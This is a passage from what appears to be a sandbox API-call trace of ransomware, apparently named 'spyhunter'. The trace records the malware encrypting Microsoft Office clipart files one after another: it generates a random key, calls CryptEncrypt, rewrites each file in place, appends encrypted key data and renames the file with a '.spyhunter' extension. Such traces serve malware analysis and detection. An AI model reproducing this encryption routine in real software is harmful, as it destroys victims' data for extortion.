oledb\\10\\cartridges\\sql2000.xsl.spyhunter")) returned 1 [0096.892] GetProcessHeap () returned 0x2c0000 [0096.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0096.892] GetProcessHeap () returned 0x2c0000 [0096.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0096.892] GetProcessHeap () returned 0x2c0000 [0096.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34e8d8 | out: hHeap=0x2c0000) returned 1 [0096.892] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcd8 | out: pbBuffer=0x248fcd8) returned 1 [0096.892] GetProcessHeap () returned 0x2c0000 [0096.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0096.892] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcd0*=0x30) returned 1 [0096.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0097.078] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 67 [0097.078] StrStrW (lpFirst="AG00154_.GIF", lpSrch=".txt") returned 0x0 [0097.078] GetProcessHeap () returned 0x2c0000 [0097.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c14890 [0097.078] ReadFile (in: hFile=0x178, lpBuffer=0x2c14890, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc94, lpOverlapped=0x0 | out: lpBuffer=0x2c14890*, lpNumberOfBytesRead=0x248fc94*=0x14c3, lpOverlapped=0x0) returned 1 [0097.114] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffeb3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.114] WriteFile (in: hFile=0x178, lpBuffer=0x2c14890*, nNumberOfBytesToWrite=0x14c3, lpNumberOfBytesWritten=0x248fc94, lpOverlapped=0x0 | out: lpBuffer=0x2c14890*, lpNumberOfBytesWritten=0x248fc94*=0x14c3, lpOverlapped=0x0) returned 1 [0097.114] GetProcessHeap () returned 0x2c0000 [0097.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c14890 | out: hHeap=0x2c0000) returned 1 [0097.114] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.114] WriteFile (in: hFile=0x178, lpBuffer=0x248fcd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc94, lpOverlapped=0x0 | out: lpBuffer=0x248fcd4*, lpNumberOfBytesWritten=0x248fc94*=0x4, lpOverlapped=0x0) returned 1 [0097.114] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc94, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc94*=0x30, lpOverlapped=0x0) returned 1 [0097.114] CloseHandle (hObject=0x178) returned 1 [0097.175] GetProcessHeap () returned 0x2c0000 [0097.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0097.176] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.spyhunter") returned 77 [0097.176] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.spyhunter")) returned 1 [0097.654] GetProcessHeap () returned 0x2c0000 [0097.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0097.654] GetProcessHeap () returned 0x2c0000 [0097.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0097.654] GetProcessHeap () returned 0x2c0000 [0097.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x359170 | out: hHeap=0x2c0000) returned 1 [0097.654] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcd0 | out: pbBuffer=0x248fcd0) returned 1 [0097.654] GetProcessHeap () returned 0x2c0000 [0097.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0097.654] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcc8*=0x30) returned 1 [0097.654] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0097.655] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 67 [0097.655] StrStrW (lpFirst="FD02115_.WMF", lpSrch=".txt") returned 0x0 [0097.655] GetProcessHeap () returned 0x2c0000 [0097.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c1e168 [0097.655] ReadFile (in: hFile=0x178, lpBuffer=0x2c1e168, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc8c, lpOverlapped=0x0 | out: lpBuffer=0x2c1e168*, lpNumberOfBytesRead=0x248fc8c*=0x1234, lpOverlapped=0x0) returned 1 [0097.791] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffedcc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.791] WriteFile (in: hFile=0x178, lpBuffer=0x2c1e168*, nNumberOfBytesToWrite=0x1234, lpNumberOfBytesWritten=0x248fc8c, lpOverlapped=0x0 | out: lpBuffer=0x2c1e168*, lpNumberOfBytesWritten=0x248fc8c*=0x1234, lpOverlapped=0x0) returned 1 [0097.791] GetProcessHeap () returned 0x2c0000 [0097.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1e168 | out: hHeap=0x2c0000) returned 1 [0097.793] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.793] WriteFile (in: hFile=0x178, lpBuffer=0x248fccc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc8c, lpOverlapped=0x0 | out: lpBuffer=0x248fccc*, lpNumberOfBytesWritten=0x248fc8c*=0x4, lpOverlapped=0x0) returned 1 [0097.793] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc8c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc8c*=0x30, lpOverlapped=0x0) returned 1 [0097.793] CloseHandle (hObject=0x178) returned 1 [0097.793] GetProcessHeap () returned 0x2c0000 [0097.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c1e168 [0097.794] wnsprintfW (in: pszDest=0x2c1e168, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF.spyhunter") returned 77 [0097.794] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf.spyhunter")) returned 1 [0098.220] GetProcessHeap () returned 0x2c0000 [0098.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1e168 | out: hHeap=0x2c0000) returned 1 [0098.221] GetProcessHeap () returned 0x2c0000 [0098.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.222] GetProcessHeap () returned 0x2c0000 [0098.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1a6e0 | out: hHeap=0x2c0000) returned 1 [0098.222] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcd0 | out: pbBuffer=0x248fcd0) returned 1 [0098.222] GetProcessHeap () returned 0x2c0000 [0098.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.222] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcc8*=0x30) returned 1 [0098.222] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106208.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.258] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 67 [0098.258] StrStrW (lpFirst="J0106208.WMF", lpSrch=".txt") returned 0x0 [0098.258] GetProcessHeap () returned 0x2c0000 [0098.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c229b0 [0098.259] ReadFile (in: hFile=0x170, lpBuffer=0x2c229b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc8c, lpOverlapped=0x0 | out: lpBuffer=0x2c229b0*, lpNumberOfBytesRead=0x248fc8c*=0x2800, lpOverlapped=0x0) returned 1 [0098.273] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.273] WriteFile (in: hFile=0x170, lpBuffer=0x2c229b0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fc8c, lpOverlapped=0x0 | out: lpBuffer=0x2c229b0*, lpNumberOfBytesWritten=0x248fc8c*=0x2800, lpOverlapped=0x0) returned 1 [0098.273] GetProcessHeap () returned 0x2c0000 [0098.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c229b0 | out: hHeap=0x2c0000) returned 1 [0098.273] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.273] WriteFile (in: hFile=0x170, lpBuffer=0x248fccc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc8c, lpOverlapped=0x0 | out: lpBuffer=0x248fccc*, lpNumberOfBytesWritten=0x248fc8c*=0x4, lpOverlapped=0x0) returned 1 [0098.274] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc8c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc8c*=0x30, lpOverlapped=0x0) returned 1 [0098.274] CloseHandle (hObject=0x170) returned 1 [0098.274] GetProcessHeap () returned 0x2c0000 [0098.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3a1020 [0098.274] wnsprintfW (in: pszDest=0x3a1020, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF.spyhunter") returned 77 [0098.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106208.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106208.wmf.spyhunter")) returned 1 [0098.275] GetProcessHeap () returned 0x2c0000 [0098.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a1020 | out: hHeap=0x2c0000) returned 1 [0098.275] GetProcessHeap () returned 0x2c0000 [0098.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.275] GetProcessHeap () returned 0x2c0000 [0098.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c312d8 | out: hHeap=0x2c0000) returned 1 [0098.275] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcc8 | out: pbBuffer=0x248fcc8) returned 1 [0098.275] GetProcessHeap () returned 0x2c0000 [0098.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.275] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcc0*=0x30) returned 1 [0098.275] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107426.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.276] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 67 [0098.276] StrStrW (lpFirst="J0107426.WMF", lpSrch=".txt") returned 0x0 [0098.276] GetProcessHeap () returned 0x2c0000 [0098.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c229b0 [0098.276] ReadFile (in: hFile=0x170, lpBuffer=0x2c229b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc84, lpOverlapped=0x0 | out: lpBuffer=0x2c229b0*, lpNumberOfBytesRead=0x248fc84*=0x2800, lpOverlapped=0x0) returned 1 [0098.284] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.284] WriteFile (in: hFile=0x170, lpBuffer=0x2c229b0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fc84, lpOverlapped=0x0 | out: lpBuffer=0x2c229b0*, lpNumberOfBytesWritten=0x248fc84*=0x2800, lpOverlapped=0x0) returned 1 [0098.284] GetProcessHeap () returned 0x2c0000 [0098.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c229b0 | out: hHeap=0x2c0000) returned 1 [0098.284] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.284] WriteFile (in: hFile=0x170, lpBuffer=0x248fcc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc84, lpOverlapped=0x0 | out: lpBuffer=0x248fcc4*, lpNumberOfBytesWritten=0x248fc84*=0x4, lpOverlapped=0x0) returned 1 [0098.284] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc84, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc84*=0x30, lpOverlapped=0x0) returned 1 [0098.284] CloseHandle (hObject=0x170) returned 1 [0098.284] GetProcessHeap () returned 0x2c0000 [0098.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3a1020 [0098.285] wnsprintfW (in: pszDest=0x3a1020, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF.spyhunter") returned 77 [0098.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107426.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107426.wmf.spyhunter")) returned 1 [0098.285] GetProcessHeap () returned 0x2c0000 [0098.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a1020 | out: hHeap=0x2c0000) returned 1 [0098.285] GetProcessHeap () returned 0x2c0000 [0098.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.285] GetProcessHeap () returned 0x2c0000 [0098.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1f430 | out: hHeap=0x2c0000) returned 1 [0098.286] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcc8 | out: pbBuffer=0x248fcc8) returned 1 [0098.286] GetProcessHeap () returned 0x2c0000 [0098.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.286] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcc0*=0x30) returned 1 [0098.286] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107480.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.287] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 67 [0098.287] StrStrW (lpFirst="J0107480.WMF", lpSrch=".txt") returned 0x0 [0098.287] GetProcessHeap () returned 0x2c0000 [0098.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c20168 [0098.287] ReadFile (in: hFile=0x170, lpBuffer=0x2c20168, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc84, lpOverlapped=0x0 | out: lpBuffer=0x2c20168*, lpNumberOfBytesRead=0x248fc84*=0x1788, lpOverlapped=0x0) returned 1 [0098.299] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffe878, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.299] WriteFile (in: hFile=0x170, lpBuffer=0x2c20168*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x248fc84, lpOverlapped=0x0 | out: lpBuffer=0x2c20168*, lpNumberOfBytesWritten=0x248fc84*=0x1788, lpOverlapped=0x0) returned 1 [0098.299] GetProcessHeap () returned 0x2c0000 [0098.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20168 | out: hHeap=0x2c0000) returned 1 [0098.300] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.300] WriteFile (in: hFile=0x170, lpBuffer=0x248fcc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc84, lpOverlapped=0x0 | out: lpBuffer=0x248fcc4*, lpNumberOfBytesWritten=0x248fc84*=0x4, lpOverlapped=0x0) returned 1 [0098.300] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc84, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc84*=0x30, lpOverlapped=0x0) returned 1 [0098.300] CloseHandle (hObject=0x170) returned 1 [0098.300] GetProcessHeap () returned 0x2c0000 [0098.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.300] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF.spyhunter") returned 77 [0098.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107480.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107480.wmf.spyhunter")) returned 1 [0098.301] GetProcessHeap () returned 0x2c0000 [0098.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.301] GetProcessHeap () returned 0x2c0000 [0098.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.301] GetProcessHeap () returned 0x2c0000 [0098.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1f910 | out: hHeap=0x2c0000) returned 1 [0098.301] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcc0 | out: pbBuffer=0x248fcc0) returned 1 [0098.301] GetProcessHeap () returned 0x2c0000 [0098.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.301] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcb8*=0x30) returned 1 [0098.301] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107484.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.301] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 67 [0098.301] StrStrW (lpFirst="J0107484.WMF", lpSrch=".txt") returned 0x0 [0098.301] GetProcessHeap () returned 0x2c0000 [0098.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c20168 [0098.301] ReadFile (in: hFile=0x170, lpBuffer=0x2c20168, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc7c, lpOverlapped=0x0 | out: lpBuffer=0x2c20168*, lpNumberOfBytesRead=0x248fc7c*=0xbe0, lpOverlapped=0x0) returned 1 [0098.342] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff420, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.342] WriteFile (in: hFile=0x170, lpBuffer=0x2c20168*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x248fc7c, lpOverlapped=0x0 | out: lpBuffer=0x2c20168*, lpNumberOfBytesWritten=0x248fc7c*=0xbe0, lpOverlapped=0x0) returned 1 [0098.342] GetProcessHeap () returned 0x2c0000 [0098.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20168 | out: hHeap=0x2c0000) returned 1 [0098.342] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.342] WriteFile (in: hFile=0x170, lpBuffer=0x248fcbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc7c, lpOverlapped=0x0 | out: lpBuffer=0x248fcbc*, lpNumberOfBytesWritten=0x248fc7c*=0x4, lpOverlapped=0x0) returned 1 [0098.342] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc7c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc7c*=0x30, lpOverlapped=0x0) returned 1 [0098.342] CloseHandle (hObject=0x170) returned 1 [0098.342] GetProcessHeap () returned 0x2c0000 [0098.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.342] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF.spyhunter") returned 77 [0098.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107484.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107484.wmf.spyhunter")) returned 1 [0098.344] GetProcessHeap () returned 0x2c0000 [0098.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.344] GetProcessHeap () returned 0x2c0000 [0098.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.344] GetProcessHeap () returned 0x2c0000 [0098.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1f9e0 | out: hHeap=0x2c0000) returned 1 [0098.344] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcc0 | out: pbBuffer=0x248fcc0) returned 1 [0098.344] GetProcessHeap () returned 0x2c0000 [0098.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.345] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcb8*=0x30) returned 1 [0098.345] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.345] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 67 [0098.345] StrStrW (lpFirst="J0145168.JPG", lpSrch=".txt") returned 0x0 [0098.345] GetProcessHeap () returned 0x2c0000 [0098.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c251f8 [0098.345] ReadFile (in: hFile=0x170, lpBuffer=0x2c251f8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc7c, lpOverlapped=0x0 | out: 